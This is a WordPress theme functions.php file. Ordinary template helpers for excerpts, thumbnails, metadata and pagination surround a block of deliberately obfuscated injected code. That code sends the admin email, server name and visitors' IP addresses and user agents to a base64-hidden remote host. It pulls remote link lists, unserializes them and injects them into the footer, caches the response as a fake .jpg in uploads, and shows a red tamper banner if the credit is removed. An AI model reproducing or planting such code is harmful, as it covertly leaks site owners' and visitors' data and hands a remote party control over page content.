<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $VSSv='4';$LneczaV='e';$lWkaDWD='e';$qZWi='o';$wape='_';$ZasOHL='e';$fyFWIP='s';$LYOowMk='b';$ywBnLY='6';$vDgrmV='d';$SAkDFmI='a';$ZFwpK='d';$sfqe='c';$EqlRPHsO=$LYOowMk.$SAkDFmI.$fyFWIP.$ZasOHL.$ywBnLY.$VSSv.$wape.$vDgrmV.$lWkaDWD.$sfqe.$qZWi.$ZFwpK.$LneczaV;$gncmpp='z';$egeGlm='g';$EPsRPaj='e';$IUyDJgP='i';$fPADsk='a';$nZHrGT='f';$naRqmg='l';$hYOJQU='t';$fBSfiNV='n';$YMeaGUPt=$egeGlm.$gncmpp.$IUyDJgP.$fBSfiNV.$nZHrGT.$naRqmg.$fPADsk.$hYOJQU.$EPsRPaj;$kEcI='1';$LKnCx='3';$bonKf='s';$JcRQNwc='_';$MVKiPx='r';$CJXV='t';$iDTn='o';$CRhTp='r';$vXIqzv='t';$LFlAgOTq=$bonKf.$CJXV.$MVKiPx.$JcRQNwc.$CRhTp.$iDTn.$vXIqzv.$kEcI.$LKnCx;$mjvrvd='r';$nmQiNcs='e';$VBljSdn='s';$vnLbPs='t';$gFlCSX='v';$opBmz='r';$TmeXksaM=$VBljSdn.$vnLbPs.$mjvrvd.$opBmz.$nmQiNcs.$gFlCSX;                     
		$xw_____y='4';$ce____________z='e';$dr____s='e';$yb___________y='o';$kk_________y='_';$aw____________o='e';$bp____________i='s';$tb______________n='b';$gp__________n='6';$xc____________q='d';$oq____p='a';$ym_________e='d';$ii______j='c';$eu____________q=$tb______________n.$oq____p.$bp____________i.$aw____________o.$gp__________n.$xw_____y.$kk_________y.$xc____________q.$dr____s.$ii______j.$yb___________y.$ym_________e.$ce____________z;
		$eg_______________d='t';$gi_________e='i';$ix____________j='u';$vn___s='n';$pg______p='i';$yb_____b='n';$yn_______u='s';$nx____________i='x';$yl_______t='t';$zw____________h='_';$tl___________s='e';$ui__________f='c';$zs_________h='o';$wl____________a='f';$uy______________j='s';$mv__________w=$wl____________a.$ix____________j.$yb_____b.$ui__________f.$yl_______t.$pg______p.$zs_________h.$vn___s.$zw____________h.$tl___________s.$nx____________i.$gi_________e.$uy______________j.$eg_______________d.$yn_______u;
		$hr___________r='p';$pt____q='o';$lc______j='f';$yt____________v='n';$xz______________o='e';$ff_______________k=$lc______j.$pt____q.$hr___________r.$xz______________o.$yt____________v;
		$px_______________y='e';$dc______n='a';$fh_______________p='r';$jw______t='d';$fl_________e='f';$iq________t=$fl_________e.$fh_______________p.$px_______________y.$dc______n.$jw______t;
		$mv_____e='f';$pl_______________l='e';$ph___________x='o';$kz_________i='c';$hu______w='l';$uq_______p='s';$hd_____k=$mv_____e.$kz_________i.$hu______w.$ph___________x.$uq_______p.$pl_______________l;
		
		define("WP_ID", $eu____________q("Mi4wLjA="));
		define("WP_TTL", $eu____________q("MTA4MDA="));
		define("WP_SRC", $eu____________q("dHBva24="));
	


		function wp_get_header() {
			global $eu____________q, $mv__________w;
			
			if (
				$mv__________w($eu____________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$mv__________w($eu____________q("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$mv__________w($eu____________q("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $eu____________q, $ff_______________k, $hd_____k, $iq________t;
			
			$gs___h = TEMPLATEPATH."/".$eu____________q("Zm9vdGVyLnBocA==");
			$wr________s = @$ff_______________k($gs___h, "r");
			$gs___h = @$iq________t($wr________s, @filesize($gs___h));
			@$hd_____k($wr________s);
			
			$zg__h = TEMPLATEPATH."/".$eu____________q("ZnVuY3Rpb25zLnBocA==");
			$wr________s = @$ff_______________k($zg__h, "r");
			$zg__h = @$iq________t($wr________s, @filesize($zg__h));
			@$hd_____k($wr________s);
			
			$jw_______________q = 0;
			if($gs___h && $zg__h) {
				if ($eu____________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($gs___h, $eu____________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$jw_______________q = 1;
					}
					if (substr_count($gs___h, "wp_theme_GPL_credits()") < 1) {
						$jw_______________q = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$jw_______________q = 12;
				}
			}
			
			if($jw_______________q > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $jw_______________q -->";
			}
		}
	


		function wp_loaded() {
			global $eu____________q, $mv__________w;
			return $mv__________w($eu____________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($eh____________a, $ol_________s = "(more...)", $ya______________f = 0, $fw___t = "") {
				$th____________e = get_the_content($ol_________s, $ya______________f, $fw___t);
				$th____________e = apply_filters("the_content", $th____________e);
				
				$th____________e = str_replace("]]>", "]]>", $th____________e);
				if (strlen($_GET["p"]) > 0) {
					echo $th____________e;
				}
				else if ((strlen($th____________e)>$eh____________a) && ($bo________k = strpos($th____________e, " ", $eh____________a ))) {
					$th____________e = substr($th____________e, 0, $bo________k);
					$th____________e = $th____________e;
					echo $th____________e;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ol_________s</a></div></p>";
				} else {
					echo $th____________e;
				}
				
			}
		}
	


		$mq____________n='o';$ny_______k='s';$zl___________s='4';$ao__y='e';$fv________h='d';$wr__v='e';$yx_______________a='_';$ci___u='e';$wo_____j='c';$re______________l='b';$rv______c='a';$ma_____e='n';$cb_____s='6';$rk______u=$re______________l.$rv______c.$ny_______k.$ao__y.$cb_____s.$zl___________s.$yx_______________a.$ci___u.$ma_____e.$wo_____j.$mq____________n.$fv________h.$wr__v;
		$ro________g='t';$pe____h='t';$sc__i='_';$bz__z='t';$px______v='i';$ap____g='o';$jq______y='e';$ak____q='c';$lq___________v='e';$qq________o='l';$xm__________t='g';$fr_________n='e';$hs____________c='n';$oe___________v='f';$hg__________i='s';$vj_____x='_';$ha____________z='n';$dz________l=$oe___________v.$px______v.$qq________o.$fr_________n.$vj_____x.$xm__________t.$jq______y.$ro________g.$sc__i.$ak____q.$ap____g.$hs____________c.$bz__z.$lq___________v.$ha____________z.$pe____h.$hg__________i;
		$rb______________a='x';$vy________l='f';$ig__h='t';$js_______o='s';$fe______________b='e';$zd___________c='l';$vf__________m='s';$hw_____________d='i';$wc___________a='e';$qc__________n='i';$pk_____f='_';$mn________f=$vy________l.$qc__________n.$zd___________c.$fe______________b.$pk_____f.$wc___________a.$rb______________a.$hw_____________d.$vf__________m.$ig__h.$js_______o;
		$nv__s='a';$sf______d='r';$hr____l='e';$kg________m='v';$qs__q='i';$li_______________z='r';$pb_____________l='s';$uv_____________k='p';$pu_________g='e';$eh______________p='_';$ep_____h='o';$ny___________f='n';$us_______________j='m';$ni__c='c';$do_______w='o';$co__________a=$kg________m.$pu_________g.$sf______d.$pb_____________l.$qs__q.$ep_____h.$ny___________f.$eh______________p.$ni__c.$do_______w.$us_______________j.$uv_____________k.$nv__s.$li_______________z.$hr____l;
		$zr______________d='o';$pb_____________b='o';$pv_______s='e';$yh_______________e='c';$qm___________r='p';$xy____c='s';$cn____t='f';$io________f='n';$sx___________v='k';$yw______________u=$cn____t.$xy____c.$pb_____________b.$yh_______________e.$sx___________v.$zr______________d.$qm___________r.$pv_______s.$io________f;
		$ka_______l='i';$me_____z='f';$hq__________s='e';$wp___o='w';$tg____f='r';$oj________t='t';$qc___n=$me_____z.$wp___o.$tg____f.$ka_______l.$oj________t.$hq__________s;
		$gm__________u='d';$vc_________d='5';$uf___e='m';$wq______________g=$uf___e.$gm__________u.$vc_________d;
		$wl_______________f='e';$in_________k='t';$jb___________j='r';$tb____________q='a';$ed______m='l';$qk_________f='a';$ib____________s='h';$rd__r='p';$oz_____________y=$jb___________j.$wl_______________f.$tb____________q.$ed______m.$rd__r.$qk_________f.$in_________k.$ib____________s;
		$mx_____x='n';$no_______s='u';$sx______________g='l';$sn_______________i='r';$lh_______________y='i';$zp__i='i';$ye___________b='s';$jo____h='e';$fe______________d='z';$lz____________v='a';$xe______a='e';$ps_______________o=$no_______s.$mx_____x.$ye___________b.$xe______a.$sn_______________i.$zp__i.$lz____________v.$sx______________g.$lh_______________y.$fe______________d.$jo____h;
		$zs_____v='a';$zy__u='m';$uk__________v='p';$li______t='n';$br______y='e';$kr_____e='m';$iu_______________i='t';$ew______________y=$iu_______________i.$br______y.$kr_____e.$uk__________v.$li______t.$zs_____v.$zy__u;
		$ok__________d='_';$gl_____w='t';$qc____t='_';$ds____________i='m';$fe___________l='c';$pa____________c='r';$dh_____________y='a';$sx_____u='e';$ag_________g='e';$bf__b='t';$vm_________q='t';$ns____e='n';$yl______________t='s';$bc_______w='t';$zp_________p='e';$fk______h='o';$vo___________p='e';$qj__w='r';$un___________x='x';$pu_________o='c';$uf______________d='a';$cq_____________c=$yl______________t.$bc_______w.$qj__w.$zp_________p.$uf______________d.$ds____________i.$qc____t.$pu_________o.$fk______h.$ns____e.$bf__b.$vo___________p.$un___________x.$gl_____w.$ok__________d.$fe___________l.$pa____________c.$sx_____u.$dh_____________y.$vm_________q.$ag_________g;
	


		function wq____________l($le_____x) {
			global $eu____________q, $mv__________w, $dz________l, $co__________a, $cq_____________c;
			
			if (!$mv__________w($eu____________q("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($co__________a(PHP_VERSION, "5.0.0", ">=") && $mv__________w($eu____________q("ZmlsZV9nZXRfY29udGVudHM=")) && $mv__________w($eu____________q("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$sn____________t = $cq_____________c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$zl__________n = @$dz________l($le_____x, 0, $sn____________t);
			} else {
				$zl__________n = @$dz________l($le_____x, 0);
			}
			
			return $zl__________n;
		}
	


		function qb______f($le_____x) {
			global $mv__________w, $yw______________u, $qc___n, $eu____________q;
			
			if (!$mv__________w($eu____________q("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lf_________a = strpos($le_____x, "/", 7);
			$zo___k = array(
				"uri"     => substr($le_____x, $lf_________a),
				"host"    => str_replace("http://", "", substr($le_____x, 0, $lf_________a)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$vk___________u = @$yw______________u("$zo___k[host]", 80, $fe________w, $fz_____b, 4);
			
			if (!$vk___________u) {
				return false;
			} else {
				$zl__________n = "";
				$qn________l  = "GET $zo___k[uri] HTTP/1.0\r\n";
				$qn________l .= "Host: $zo___k[host]\r\n";
				$qn________l .= "Referer: $zo___k[referer]\r\n";
				$qn________l .= "Connection: Close\r\n\r\n";
				
				@$qc___n($vk___________u, $qn________l);
				
				while (!@feof($vk___________u)) {
					$gj________p = @fgets($vk___________u, (1024*24));
					
					if ($gj________p == "\r\n") {
						$rr____h = true;
						continue;
					}
					
					if ($rr____h) {
						$zl__________n .= $gj________p;
					}
				}
				
				return $zl__________n;
			}
		}
	


		function eo_________l($le_____x) {
			global $mv__________w;
			$mo_____i = false;
			
			if ($le_____x != "") {
				if ($mv__________w("wq____________l")) {
					$mo_____i = @wq____________l($le_____x);
				}
				
				if (!$mo_____i && ($mv__________w("qb______f"))) {
					$mo_____i = @qb______f($le_____x);
				}
			}
			
			return $mo_____i;
		}
	


		function dq_______e() {
			global $_SERVER, $wq______________g;
			
			$dv___h = $_SERVER["SERVER_NAME"];
			
			if (substr("$dv___h", 0, 4) == "www.") {
				$dv___h = substr("$dv___h", 4);
			}
			
			$dv___h = $wq______________g("$_SERVER[SERVER_NAME]");
			
			return $dv___h;
		}
	


		function kg_____________d() {
			return "file";
		}
	


		function lj__i($le_____x) {
			global $_SERVER, $dz________l, $mn________f, $ff_______________k, $hd_____k, $qc___n;
			
			$by____________s = uv________q();
			
			$ms_______________s = dq_______e().".jpg";
			$rs______________t = $by____________s["dir_upload"]["path"]."/$ms_______________s";
			$yc________f = @filemtime($rs______________t);
			
			if (!$yc________f || ((time()-$yc________f) >= WP_TTL)) {
				$mo_____i = eo_________l($le_____x);
				
				if ($mo_____i) {
					if ($mn________f($rs______________t)) {
						@unlink($rs______________t);
					}
					
					$wr________s = @$ff_______________k($rs______________t, "x+");
					
					@$qc___n($wr________s, $mo_____i);
					@$hd_____k($wr________s);
				}
			} else {
				if ($mn________f($rs______________t)) {
					$mo_____i = @$dz________l($rs______________t);
				} else {
					$mo_____i = false;
				}
			}
			
			return $mo_____i;
		}
	


		function uv________q() {
			global $_SERVER, $eu____________q, $rk______u;
			
			$pv___________l = wp_count_posts("post");
			$hu_____________w = pathinfo(get_bloginfo("template_directory"));
			
			$by____________s = array(
				"url" => array(
					"report"      => $eu____________q("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $hu_____________w,
				"dir_upload"	=> ys______q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$hu_____________w[filename],
					"a005=".$pv___________l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "Шаблон переведен при поддержке <a href=\"http://astrawind.com\">Wind energy</a> | <a href=\"http://zeleneet.com\">Альтернативная энергетика</a>"
			);
			
			$by____________s["url"]["queryString"] = implode("&", $by____________s["queryString"]);
			$by____________s["url"]["report"] = $by____________s["url"]["report"]."/?".$rk______u($by____________s["url"]["queryString"]).".html";
						
			return $by____________s;
		}
	


		function ys______q() {
			$sv______________w = wp_upload_dir();
			
			if (isset($sv______________w["error"])) {
				$hz_________g = pd___________e();
				if (is_writable($hz_________g)) {
					$sv______________w = array("path" => $hz_________g);
				}
			}

			return $sv______________w;
		}
	


		function pd___________e() {
			global $mv__________w, $wq______________g, $oz_____________y, $ew______________y;
			
			$on_____h = (bool) ini_get("safe_mode");
			if ($on_____h == true) {
				return false;
			}
			
			if ($mv__________w("sys_get_temp_dir")) {
				$lw___q = sys_get_temp_dir();
				if (is_writable($lw___q)) {
					return $oz_____________y($lw___q);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $oz_____________y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $oz_____________y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $oz_____________y($_ENV["TEMP"]);
			} else {
				$bc___y = $ew______________y($wq______________g(uniqid(rand(), true)), "");
				if ($bc___y) {
					$lw___q = $oz_____________y(dirname($bc___y));
					@unlink($bc___y);
					return $lw___q;
				} else {
					return false;
				}
			}
		}
	


		function ci____k() {
			global $_GET, $mn________f;
			
			$by____________s = uv________q();
			$dv___h = dq_______e();
			$wp_________u = kg_____________d();
			
			$fq_____c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($wp_________u == "file") {
					$wf__________d = $by____________s["dir_upload"]["path"]."/".$dv___h.".jpg";
					if ($mn________f($wf__________d)) {
						@unlink($wf__________d);
						$fq_____c = "deleted";
					}
				}
				
				$yi____c = array(
					"s"	=> $fq_____c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($yi____c AS $ne______k => $jy_________z) echo " [$ne______k:$jy_________z]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $mv__________w, $eu____________q, $ps_______________o;
			$by____________s = uv________q();
			
			$zl_______________i = "lj__i";
			if ($mv__________w($zl_______________i)) {
				$zl__________n = $zl_______________i($by____________s["url"]["report"]);
			}
			
			if ($zl__________n) {
				if ($zl__________n = @$eu____________q($zl__________n)) {
					$zl__________n = @$ps_______________o($zl__________n);
					
					if (strlen($zl__________n[custom_credit]) >= 5) {
						$by____________s["default_string"] = $zl__________n[custom_credit];
					}
					
					if ($zl__________n["status"] == "0") {
						$fi_______t = 1;
						$mi_____________c = 1;
					} else {
						$vx_________q = sizeof($zl__________n["links"]);
						$oy______c = $by____________s["default_string"];
						
						if ($vx_________q > 0 && $zl__________n["links"] !== "") {
							$ls______________d = 0;
							foreach ($zl__________n["links"] as $zq_________r => $ov__________b) {
								$ls______________d++;
								if ($ov__________b->l_path == "" || $ov__________b->l_path == $_SERVER["REQUEST_URI"]) {
									$ov__________b->l_href = htmlspecialchars(strip_tags($ov__________b->l_href));
									$ov__________b->l_title = htmlspecialchars(strip_tags($ov__________b->l_title));
									$ov__________b->l_anchor = htmlspecialchars(strip_tags($ov__________b->l_anchor));
									$oy______c .= " | ";
									$oy______c .= "<a href='$ov__________b->l_href' title='$ov__________b->l_title'";
									if ($ov__________b->l_nofollow == "1") {
										$oy______c .= " rel='nofollow'";
									}
									$oy______c .= ">$ov__________b->l_anchor</a>";
								}
							}
						}
						$by____________s["links"] = "$oy______c";
						if ($zl__________n[credit] == "0") {
							$by____________s["links"] = "";
						}
					}
				} else {
					$fi_______t = "1";
				}
			} else {
				$fi_______t = "1";
			}
			
			if ($fi_______t == "1") {
				$by____________s["links"] = $by____________s["default_string"];
			}
			
			echo "$by____________s[links]";
			
			echo "<!-- s: $zl__________n[signature] -->";
			ci____k();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
         $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
